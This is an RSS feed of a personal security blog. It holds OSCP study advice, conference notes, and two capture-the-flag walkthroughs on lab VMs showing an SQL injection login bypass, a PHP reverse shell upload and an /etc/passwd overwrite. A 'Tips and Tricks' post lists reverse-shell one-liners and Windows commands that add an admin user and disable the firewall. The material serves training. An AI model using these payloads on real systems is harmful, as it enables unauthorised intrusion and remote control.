DriftSec https://driftsec.ca/rss.xml en

Mutillidae Debian Build
https://driftsec.ca/Blog/mutillidae-debian-build
<span>Mutillidae Debian Build</span>
<span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">drifter</span></span>
<span>Wed, 09/19/2018 - 16:14</span>
<div><p>The attached file is a Debian 9 build of Mutillidae. Mutillidae is a great platform for learning how to do web application hacking.</p></div>
<div>
<div>File</div>
<div><span class="file file--mime-application-zip file--package-x-generic"><a href="https://driftsec.ca/sites/default/files/2018-09/Debian9_Mutillidae.zip" type="application/zip; length=895894232">Debian9_Mutillidae.zip</a></span></div>
</div>
Wed, 19 Sep 2018 19:14:33 +0000 drifter 11 at https://driftsec.ca https://driftsec.ca/Blog/mutillidae-debian-build#comments

New/Updated website
https://driftsec.ca/Blog/newupdated-website
<span>New/Updated website</span>
<span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">drifter</span></span>
<span>Mon, 06/05/2017 - 21:31</span>
<div><p>Finally got around to updating the site and giving it a new look. It's coming along. Hopefully it'll all be smooth sailing from here! :)</p></div>
Tue, 06 Jun 2017 00:31:40 +0000 drifter 9 at https://driftsec.ca

hackfest2016: Quaoar
https://driftsec.ca/VulnHub/hackfest2016-quaoar
<span>hackfest2016: Quaoar</span>
<span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">drifter</span></span>
<span>Mon, 06/05/2017 - 19:43</span>
<div><p>[VM Completed on May 18th, 2017]</p>
<p>This machine was created for the Hackfest 2016 conference, which takes place in Quebec City, Quebec, Canada. It's a conference I'm hoping to attend one year; it looks like a great time. According to the information on the VM there are three flags on this box, but I could only find two: the shell flag and the root flag. I'm not sure what the post-exploitation flag is. Anyway, let's jump into it.</p>
<p>nmap time:</p>
<pre> <code class="language-shell">root@kali:~# nmap -A -p-
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-17 08:52 ADT
Nmap scan report for Quaoar (
Host is up (0.00047s latency).
Not shown: 65526 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
|   2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp  open  domain      ISC BIND 9.8.1-P1
| dns-nsid:
|_  bind.version: 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: UIDL CAPA SASL PIPELINING STLS RESP-CODES TOP
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-05-17T11:53:13+00:00; +15s from scanner time.
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: IMAP4rev1 STARTTLS have LOGIN-REFERRALS more post-login SASL-IR LITERAL+ listed capabilities OK LOGINDISABLEDA0001 IDLE ID Pre-login ENABLE
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-05-17T11:53:14+00:00; +15s from scanner time.
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
|_imap-capabilities: IMAP4rev1 have LOGIN-REFERRALS more post-login SASL-IR LITERAL+ ENABLE capabilities OK listed AUTH=PLAINA0001 ID Pre-login IDLE
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-05-17T11:53:13+00:00; +15s from scanner time.
995/tcp open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: UIDL CAPA SASL(PLAIN) RESP-CODES PIPELINING USER TOP
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-05-17T11:53:13+00:00; +15s from scanner time.
MAC Address: 00:0C:29:82:B2:1D (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 14s, deviation: 0s, median: 14s
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.6.3)
|   Computer name: Quaoar
|   NetBIOS computer name:
|   Domain name:
|   FQDN: Quaoar
|_  System time: 2017-05-17T07:53:13-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms Quaoar (

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.39 seconds
</code></pre>
<p>So we have some basic services open here. There's a web server, so let's check that out.</p>
<div class="image-preview"><img alt="website1" data-entity-type="file" data-entity-uuid="c2940e59-ffd2-41ba-ab53-13175b620694" src="/sites/default/files/inline-images/website1.png" /></div>
<p><img alt="website2" data-entity-type="file" data-entity-uuid="05ee5ae6-015b-4efe-90ab-0929705d7a97" src="/sites/default/files/inline-images/website2.png" /></p>
<p>Alright. Not much to see here.
Let's run a directory brute-forcer (dirb) against it and see what it finds.</p>
<pre> <code class="language-shell">root@kali:~# dirb /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed May 17 08:57:37 2017
URL_BASE:
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL:  ----
+  (CODE:200|SIZE:1672)
+  (CODE:403|SIZE:289)
+  (CODE:200|SIZE:616848)
+  (CODE:200|SIZE:100)
+  (CODE:200|SIZE:271)
+  (CODE:200|SIZE:271)
+  (CODE:403|SIZE:294)
==&gt; DIRECTORY:
==&gt; DIRECTORY:
...truncated...</code></pre>
<p>WordPress was found. Awesome! Let's snoop around there.</p>
<p><img alt="website3" data-entity-type="file" data-entity-uuid="5b522d51-7894-4423-beb4-9af0f90659d4" src="/sites/default/files/inline-images/website3.png" /></p>
<p>Since this VM is marked as really easy, I'm going to try the default credentials to see what happens. It's always a good first choice anyway. The default credentials for WordPress are admin:admin. And voila! It worked.</p>
<p><img alt="website4" data-entity-type="file" data-entity-uuid="620d40a6-8a45-4c6f-8fed-62d3468afce6" src="/sites/default/files/inline-images/website4.png" /></p>
<p>I know there are easy ways to pop a reverse shell at this point with automated tools, but I like tinkering around. I edited the Hello Dolly plugin that ships with WordPress and inserted a PHP reverse shell. I then opened a netcat listener and waited for the shell to pop once I activated the plugin. It worked, so now I have my low-level shell.</p>
<pre> <code class="language-shell">root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 36687
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
 21:21:45 up 1 day, 13:30,  0 users,  load average: 0.08, 0.08, 0.17
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Quaoar:/$
</code></pre>
<p>Flag 1:</p>
<pre> <code class="language-shell">www-data@Quaoar:/home/wpadmin$ ls
ls
flag.txt
www-data@Quaoar:/home/wpadmin$ cat flag.txt
cat flag.txt
2bafe61f03117ac66a73c3c514de796e
</code></pre>
<p>Now it's time to get my root shell. First things first, let's check the passwd file:</p>
<pre> <code class="language-shell">root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
.......Truncated.......
postgres:x:115:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
tomcat6:x:116:126::/usr/share/tomcat6:/bin/false
wpadmin:x:1001:1001::/home/wpadmin:/bin/sh</code></pre>
<p>There is a user called wpadmin. Again, let's try the easy stuff first. I used su to switch to wpadmin with the password wpadmin. It worked, so now I have that user's account and can SSH into the box instead of relying on my netcat listener. More stable. Stable is good.</p>
<p>I tried to sudo su my way to root, but wpadmin isn't allowed to use sudo. I poked around and tried a few kernel exploits that could potentially have given me a root prompt, but no such luck. Since the box is running WordPress, I checked its config file to see if there was anything juicy in there.</p>
<pre> <code class="language-php">/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/** */
define('WP_HOME','/wordpress/');
define('WP_SITEURL','/wordpress/');</code></pre>
<p>Ha. Ha... this is interesting. This just might be the info I'm looking for.</p>
<pre> <code class="language-shell">wpadmin@Quaoar:/var/www/wordpress$ su
Password: rootpassword!
root@Quaoar:/var/www/wordpress#
</code></pre>
<p>Flag 2:</p>
<pre> <code class="language-shell">root@Quaoar:/var/www/wordpress# cd /root
root@Quaoar:~# ls
flag.txt  vmware-tools-distrib
root@Quaoar:~# cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb</code></pre>
<p>All done!!! Great VM for beginners to poke around on and see what they can do. It was really fun!</p>
</div>
Mon, 05 Jun 2017 22:43:35 +0000 drifter 8 at https://driftsec.ca

AtlSecCon 2017
https://driftsec.ca/Blog/atlseccon-2017
<span>AtlSecCon 2017</span>
<span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">drifter</span></span>
<span>Sun, 04/30/2017 - 13:09</span>
<div><p>I had the wonderful opportunity to present at AtlSecCon 2017! I was really nervous, but the good people at AtlSecCon treated me great. I was in the first group of presenters on day 1.
So it was over quickly and I got to enjoy the rest of the conference.</p>
<p>My presentation on phishing can be found at <a href="https://speakerdeck.com/drifter666/no-phishing-beyond-this-point">Speaker Deck</a>.</p>
</div>
Sun, 30 Apr 2017 16:09:18 +0000 drifter 10 at https://driftsec.ca

Hackday Albania 2016
https://driftsec.ca/VulnHub/hackday-albania-2016
<span>Hackday Albania 2016</span>
<span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">drifter</span></span>
<span>Wed, 11/16/2016 - 15:09</span>
<div><p>[VM Completed on Nov 11, 2016]</p>
<p>The first thing I'm going to point out is that this was the first machine I've rooted in a while. My wife gave birth to our first child in March and I stepped away from all this. So I was a little rusty, but things started to work once I sat down and thought about it. Here we go!</p>
<p>The VM is set to DHCP, and after a quick scavenger hunt I found it. Naturally, nmap is the next step. Since these aren't production systems, I just do a generic, lazy, full-blown nmap scan to make sure I don't miss anything.</p>
<p><img alt="" src="/sites/default/files/2017-06/01-nmapscan.png" style="height:598px; width:940px" /></p>
<p>So it's running a web server on port 8008. Let's open up Firefox and see what is there.</p>
<p><img alt="" src="/sites/default/files/2017-06/02-defaultwebpage.png" style="height:608px; width:706px" /></p>
<p><img alt="" src="/sites/default/files/2017-06/03-sourcecode.png" style="height:759px; width:958px" /></p>
<p>Okay. So we have some Albanian text. I threw it into Google Translate to see what I could make of it. Being bilingual myself, I know Google Translate isn't the best at translating word for word, but I figured it would give me a rough translation:</p>
<pre>
Miresevini
Welcome

Ne qofte se jam UNE, e di se ku te shkoj ;)
If I am, I know where to go ;)

OK ok, por jo ketu :)
OK ok, but not here :)
</pre>
<p>Alright... So this has something to do with Mr. Robot. Well, let's see what dirb finds.</p>
<p><img alt="" src="/sites/default/files/2017-06/04-dirb.png" style="height:633px; width:742px" /></p>
<p>Nothing unusual here. There is a robots.txt file, which I'm certain at this point is the connection to Mr. Robot. Let's grab it.</p>
<p><img alt="" src="/sites/default/files/2017-06/05-wgetrobots.png" style="height:139px; width:595px" /></p>
<p><img alt="" src="/sites/default/files/2017-06/06-catrobots.png" style="height:495px; width:291px" /></p>
<p>Oh fun! Lots of crazy directories. Most of them had this picture.</p>
<p><img alt="" src="/sites/default/files/2017-06/07-urlstocheck2.png" style="height:764px; width:961px" /></p>
<p>This roughly translates to:</p>
<pre>
a eshte kjo direktoria e duhur apo po harxhoj kohen kot
Is this a proper directory or are jerk
</pre>
<p>Well then... Something got lost in translation. Am I a jerk or is the server a jerk? ... Let's keep moving. Eventually I landed on this page.</p>
<p><img alt="" src="/sites/default/files/2017-06/08-vulnbank.png" style="height:288px; width:460px" /></p>
<p>Is there any vulnbank in there?</p>
<p><img alt="" src="/sites/default/files/2017-06/09-clientlogin.png" style="height:541px; width:952px" /></p>
<p>Hey! Looky here. A very secure bank. I'd better transfer to this bank. Looks unhackable. It's right in the title that it is a secure bank, right?</p>
<p>Time to try some fuzzing.</p>
<p><img alt="" src="/sites/default/files/2017-06/10-fuzz.png" /></p>
<p>So according to this, I wasn't completely blind to SQL injection here.
I got one message back saying, "mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php". I know there is some input sanitization here. It doesn't like boolean input, so none of the AND/OR statements in MySQL will work. This part took me quite a while to figure out. I had to reread some OSCP material. When you don't use this stuff every day, you forget things. Anyway, what eventually got me in was this:</p>
<pre>
admin'%20#
</pre>
<p><img alt="" src="/sites/default/files/2017-06/11-sqli.png" /></p>
<p><img alt="" src="/sites/default/files/2017-06/12-webapploggedin.png" /></p>
<p>The %20 is the URL encoding for a space, so "admin'%20#" is really "admin' #". The single quote closes the username string, and the # comments out everything that comes after the username lookup in the MySQL statement, including the password check. So it bypasses the need for a password.</p>
<p>Looking at the first page after logging in, I can clearly see an option to upload a file. So I tried uploading a PHP reverse shell, and no luck.</p>
<p><img alt="" src="/sites/default/files/2017-06/13-phpnogo.png" style="height:371px; width:397px" /></p>
<p><img alt="" src="/sites/default/files/2017-06/14-phpnogo2.png" style="height:203px; width:776px" /></p>
<p>Well then... how nice. They told me which file types they accept. So, for the heck of it, I changed the extension from .php to .jpg. It looks like the previous attempts at uploading the .php file had worked, but the file didn't do anything.</p>
<p><img alt="" src="/sites/default/files/2017-06/15-jpgsuccess.png" style="height:439px; width:497px" /></p>
<p>Time to start my netcat listener, and success! Got my low-level shell.</p>
<p><img alt="" src="/sites/default/files/2017-06/16-revshell.png" style="height:542px; width:777px" /></p>
<p>Time to snoop. First I checked what tools were available to me.</p>
<p><img alt="" src="/sites/default/files/2017-06/17-toolsavail.png" style="height:149px; width:383px" /></p>
<p>Python 3 was installed, so I figured I would give myself a somewhat better shell to work with.</p>
<p><img alt="" src="/sites/default/files/2017-06/18-bettershell.png" style="height:70px; width:458px" /></p>
<p>Time for enumeration. The first things I check are the kernel, the home directories, and files that are world-readable, world-writable, and world-executable.</p>
<p><img alt="" src="/sites/default/files/2017-06/19-enum1.png" /></p>
<p><img alt="" src="/sites/default/files/2017-06/20-enum2.png" /></p>
<p><img alt="" src="/sites/default/files/2017-06/21-enum3.png" /></p>
<p>From this output, I've determined that it's running a fairly new kernel, and I couldn't find any direct exploits that I could leverage. I know there is a user named Taviso, so there might be something good there. Lastly, the very important /etc/passwd is writable by anyone. That makes things very interesting.</p>
<p>I figured that if I could switch user to Taviso, I might be able to push further toward becoming root. Knowing this is an Ubuntu system, simply sudoing to root as Taviso might work. If I can put my own password for Taviso into the /etc/passwd file, that would be simple to do. On a side note, in the OSCP course, changing users' passwords was usually frowned upon. Yes, it was a viable vector, but it wasn't the takeaway Offensive Security was looking for. So this was my first time doing this type of attack. It may seem rudimentary as attack vectors go, but it's new to me. It's not that I never thought about it during my time in the OSCP labs; it just wasn't the OSCP way. ;)</p>
<p>Since I'm not in a fully functional shell environment, I can't just nano or vi the /etc/passwd file and type in what I need. I'll need to overwrite the file with a little bash script. But first, I must generate my own password hash to put into /etc/passwd.</p>
<p><img alt="" src="/sites/default/files/2017-06/22-hashgenerated.png" style="height:44px; width:978px" /></p>
<p>Then I put it into this little script to overwrite /etc/passwd. Notice the "" around EOF: with the heredoc delimiter quoted, the shell doesn't expand anything inside the heredoc, so the text in red doesn't get mangled as shell variables.</p>
<p><img alt="" src="/sites/default/files/2017-06/23-passwdscript.png" /></p>
<p>Upload it to the server with wget into /tmp/, give it execute rights, and run the script...</p>
<p><img alt="" src="/sites/default/files/2017-06/24-runscriptrun.png" style="height:344px; width:766px" /></p>
<p>Check to see if the changes were made properly.</p>
<p><img alt="" src="/sites/default/files/2017-06/25-newpasswd.png" style="height:751px; width:841px" /></p>
<p>The changes worked. Time to su as Taviso and then sudo su with Taviso's password to see if root appears.</p>
<p><img alt="" src="/sites/default/files/2017-06/26-root.png" style="height:197px; width:439px" /></p>
<p>Woo! Box rooted! Now to check root's home directory to see if there is anything in there.</p>
<p><img alt="" src="/sites/default/files/2017-06/27-flag.png" style="height:251px; width:427px" /></p>
<p>As expected, a txt file with a hash for the CTF. More Albanian, which roughly translates to:</p>
<pre>
Urime,
Congratulations,

Tani nis raportin!
Now begins the report!

Flag hash: d5ed38fdbf28bc4e58be142cf5a17cf5
</pre>
<p>The moral of the story: be sure to sanitize user input, and keep the permissions on files like /etc/passwd locked down.</p>
<p>I had a lot of fun doing this. Hopefully I can keep this up. It's good exercise for the brain. Always learning new things and new ways to break a machine.</p>
</div>
Wed, 16 Nov 2016 19:09:53 +0000 drifter 7 at https://driftsec.ca

The HASK!
https://driftsec.ca/Blog/hask
<span>The HASK!</span>
<span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">drifter</span></span>
<span>Sun, 06/05/2016 - 18:53</span>
<div><p>I had the wonderful opportunity to present at The HASK last night, May 25th, in downtown Halifax. I had a great time and I can't thank the organizers enough. I wish there had been something like this when I was going to university. Seeing the number of IT students and IT professionals at the event was amazing.</p>
<p>I was asked to post the slideshow from my presentation, so you'll find it <a href="https://speakerdeck.com/drifter666/the-hask-oscp">here on Speaker Deck's website</a>.</p>
<p>Anyone looking for information on The HASK should go to their website at <a href="http://www.thehask.com">http://thehask.com</a>.
I highly recommend attending.</p>
</div>
Sun, 05 Jun 2016 21:53:45 +0000 drifter 6 at https://driftsec.ca

My Recommendations for OSCP
https://driftsec.ca/Blog/my-recommendations-oscp
<span>My Recommendations for OSCP</span>
<span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">drifter</span></span>
<span>Fri, 04/01/2016 - 14:51</span>
<div><div class="content node-blog"> <div class="field field-name-body field-type-text-with-summary field-label-hidden"> <div class="field-items"> <div class="field-item even" property="content:encoded">
<p>I've been asked a couple of times now, "What do I need to know to become OSCP certified?". It's a hard question to answer. For people who don't know, OSCP stands for Offensive Security Certified Professional. It's a grueling course by the folks over at Offensive Security, but the payoff is extraordinary! You can read my story <a href="https://driftsec.ca/Blog/what-does-it-mean-me-be-oscp-certified">here</a>. Anyway, here's my list of recommendations:</p>
<ul>
<li>Understand Windows operating systems (especially the command line).</li>
<li>Understand Linux operating systems.</li>
<li>Have extensive knowledge of networking.</li>
<li>Be familiar with Wireshark and be able to read through packet captures.</li>
<li>Be familiar with Nmap.</li>
<li>Don't rely on vulnerability scanners like Nessus or OpenVAS. You won't be able to use them in the exam. You can use them in the lab, but try to maximize finding vulnerabilities on your own with nmap and by poking around on the server.</li>
<li>Understand how to read through code, especially C, Python, Perl, PHP, Ruby, and shellcode. If you have zero experience in programming, I'd suggest taking a beginner course in Python. You won't be writing code from scratch, but you need to know how to read it.</li>
<li>Be familiar with assembly and a debugger. Don't dive heavily into this, as the course will guide you through that part. I had no experience with assembly or a debugger going into OSCP and it wasn't a major problem.</li>
<li>Be familiar with database applications like MySQL, MongoDB, and MSSQL.</li>
<li>Understand how CMS web applications like Drupal and WordPress work.</li>
<li>Keep detailed notes. Even if the information seems irrelevant, copy and paste it. You never know when the smallest detail is the answer to the riddle. Offensive Security recommends a program called KeepNote. I used it and it was great.</li>
<li>Take lots of screenshots. KeepNote can take screenshots as well.</li>
<li>Teaching yourself is huge. Be prepared to treat this course like a second job. You'll be putting in a lot of time. Some weeks I was putting in over 20 hours on top of a full-time job.</li>
<li>Take regular backups of your notes.</li>
<li>Be sure to join the Offensive Security IRC channel. You can chat with admins there and get hints. However, be sure you've done your work before asking for help; you need to show the admins you are trying hard before they'll help you out. You can also vent with other OSCP students! (Update: Offensive Security no longer maintains the IRC channel. All help is now done through their online support page and student forums.)</li>
<li>Download and install Kali and play around with it.</li>
<li>Download virtual machines from Vulnhub.com and play around with them.</li>
<li>Most importantly, try harder and have fun!</li>
</ul>
<p>This course is heavy. You'll feel overwhelmed and tired. Be sure to take lots of breaks and get sleep. Being well-rested will give you a clear mind to work in the labs. Good luck!!</p>
</div> </div> </div> </div> </div>
Fri, 01 Apr 2016 17:51:12 +0000 drifter 5 at https://driftsec.ca

OSCP Tips and Tricks
https://driftsec.ca/Blog/oscp-tips-and-tricks
<span>OSCP Tips and Tricks</span>
<span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">drifter</span></span>
<span>Fri, 04/01/2016 - 14:40</span>
<div><p>Here is a grouped list of things that helped me during my OSCP course. This is just the tip of the iceberg of the commands you'll need to know, but I used these a lot. I'm not going to go into detail on what each command does; you should be able to figure it out or already know it.</p>
<pre> <code class="language-shell">Linux Commands:
uname -a
hostname
id
ifconfig -a
cat /etc/network/interfaces
cat /etc/passwd
cat /etc/shadow
wget
fetch
ftp
nc -nlvp {port}
python -c "import pty; pty.spawn('/bin/bash')"</code></pre>
<pre> <code class="language-shell">Windows Commands:
ipconfig /all
net user /add {username} {password}
net localgroup administrators {username} /add
type {filename.txt}
netsh firewall set opmode disable
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</code></pre>
<pre> <code class="language-shell">Metasploit:
set AUTORUNSCRIPT migrate -f</code></pre>
<pre> <code class="language-shell">Nmap:
nmap -A -p- {IP}
nmap -sV -sT -p- {IP}
nmap -sU -p- {IP}
nmap -O {IP}</code></pre>
<pre> <code class="language-shell">Some Reverse Shell One-Liners:
bash -i &gt;&amp; /dev/tcp/{IP}/{Port} 0&gt;&amp;1
nc -e /bin/sh {IP} {Port}
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc {IP} {Port} &gt;/tmp/f
php -r '$sock=fsockopen("{IP}",{Port});exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</code></pre>
<p>See this website for more: <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</a></p>
<p>Blogs and Websites on Privilege Escalation:</p>
<p><a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/">https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</a><br /><a href="http://www.fuzzysecurity.com/tutorials/16.html">http://www.fuzzysecurity.com/tutorials/16.html</a><br /><a href="http://it-ovid.blogspot.ca/2012/02/windows-privilege-escalation.html">http://it-ovid.blogspot.ca/2012/02/windows-privilege-escalation.html</a><br /><a href="http://netsec.ws/?p=309">http://netsec.ws/?p=309</a></p>
<p>Useful Tools to Install in Kali:</p>
<p><a href="https://github.com/apenwarr/sshuttle">sshuttle</a><br /><a href="https://github.com/rofl0r/proxychains-ng">proxychains-ng</a><br /><a href="https://www.veil-framework.com/framework/veil-evasion/">veil-evasion</a></p>
</div>
Fri, 01 Apr 2016 17:40:04 +0000 drifter 4 at https://driftsec.ca

What does it mean to me to be OSCP certified?
https://driftsec.ca/Blog/what-does-it-mean-me-be-oscp-certified
<span>What does it mean to me to be OSCP certified?</span>
<span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">drifter</span></span>
<span>Mon, 12/14/2015 - 23:03</span>
<div><div class="content node-blog"> <div class="field field-name-body field-type-text-with-summary field-label-hidden"> <div class="field-items"> <div class="field-item even" property="content:encoded">
<p>What does it mean to be OSCP certified? This is a short and simple question, but the answer is quite loaded.
In one sense, it’s “just” another IT certification to add to my list. Another three- or four-letter acronym that the majority of people I know have to ask about: “What do those four letters mean?”. Sure, it’s just four letters, but what most people don’t understand is the hard work, dedication, and effort that has to go into earning those four letters.</p>
<p>When I started my journey to become an OSCP, I had no idea what I was stepping into. Being already OSWP certified, I thought I had a slight advantage, in that I knew how the Offensive Security courses were structured. I also thought that since I had a four-year university degree under my belt and several other certifications, I could handle this no problem. I couldn’t have been more wrong. There were nights I went to bed with headaches. This was the first course, <em>ever</em>, that I seriously considered throwing in the towel on. I was a complete noob when it came to penetration testing and this course was proving it. It was a David and Goliath scenario and I didn’t know what to do.</p>
<p>Eventually, things started to take a turn. I started to root systems in the OffSec lab. Things were starting to be fun. My employer was very good about renewing my lab subscription, which relieved some of the time pressure that was causing a block in my head. But I still kept thinking about the time. It would take a week before I rooted one system. It wasn’t until one of the OffSec admins reiterated, “This isn’t a race, it’s a marathon,” and reminded me that the purpose isn’t to just blow through all the lab machines; there is something to be learned from each machine, something to make you think differently. At this point, my head was overwhelmed. I’m sure my blood pressure was rising. I had to leave the OSCP journey for a bit. I took a month-long break and enjoyed some summertime fun with my wife.</p>
<p>After my month away from OSCP, I decided it was time to start again. With a fresh, clear head and knowing how things worked, I felt much better this time. I started researching and googling the right terms, learning new tips and tricks, and just trying things, and for the most part they started working. There were still lots of moments where I was banging my head against the keyboard. However, instead of taking a week to root a machine, I was rooting three and sometimes four in a week. It was great. I got a boost of confidence, and instead of throwing in the towel I was saying, “I can do this!”. When Offensive Security says “Try Harder!” they mean it. I was trying harder and it was working. After I conquered the server Humble, I felt pretty darn powerful. It was time to book the exam.</p>
<p>The exam was stressful at first. I had 24 hours to write it and I wasn’t sure what to expect. I’ve read on multiple blogs about people writing a bunch of scripts to automate the whole enumeration process. I didn’t trust my scripting abilities to do so. However, in the labs I had just scanned machines one by one, and that worked just as well. Doing this, I rooted more than enough systems to pass. I love the sense of humour the Offensive Security team has. The one machine that taunted me by calling me a noob during the exam was the one machine that I wasn’t able to root. However, this noob is OSCP certified now!</p>
</div> </div> </div> </div> </div>
Tue, 15 Dec 2015 03:03:01 +0000 drifter 3 at https://driftsec.ca